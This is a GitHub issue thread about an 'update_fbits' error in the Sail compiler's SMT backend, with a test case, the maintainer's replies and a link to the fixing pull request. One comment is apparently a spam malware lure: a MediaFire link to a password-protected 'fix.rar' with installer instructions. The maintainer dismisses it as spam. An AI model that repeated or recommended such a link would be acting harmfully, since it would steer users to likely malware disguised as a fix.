### ISSUE TITLE
SMT backend: Unrecognised function update_fbits

### ISSUE THREAD

**Issue by PRugg-Cap** [rems-project/sail#667]
The following generates an error ("Unrecognised function update_fbits") when building with the SMT backend (18.0) `sail -smt test.sail`, to do with initialising a vector from a bitslice of another vector? Glancing through the code and guessing, it looks like maybe there's an `update_fbits` in jib_compile.ml that should have been changed to an `internal_vector_update`, but trying that led to other errors...

```
default Order dec
$include <vector_dec.sail>

$property
function prop() -> bool = {
  let x = 0b00;
  let y = [x[0]];
  true
}
```

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Alasdair** [comment]
Thanks, probably just a case I missed when updating the SMT backend. The internal_vector_update is used when constructing initial values for vectors, so I think that's most likely unrelated.

Also I hope that I'm not going to get inundated with spam PR comments from unknown accounts posting random download links on my issues :(

**Comment by Alasdair** [comment]
Should be fixed by https://github.com/rems-project/sail/pull/670
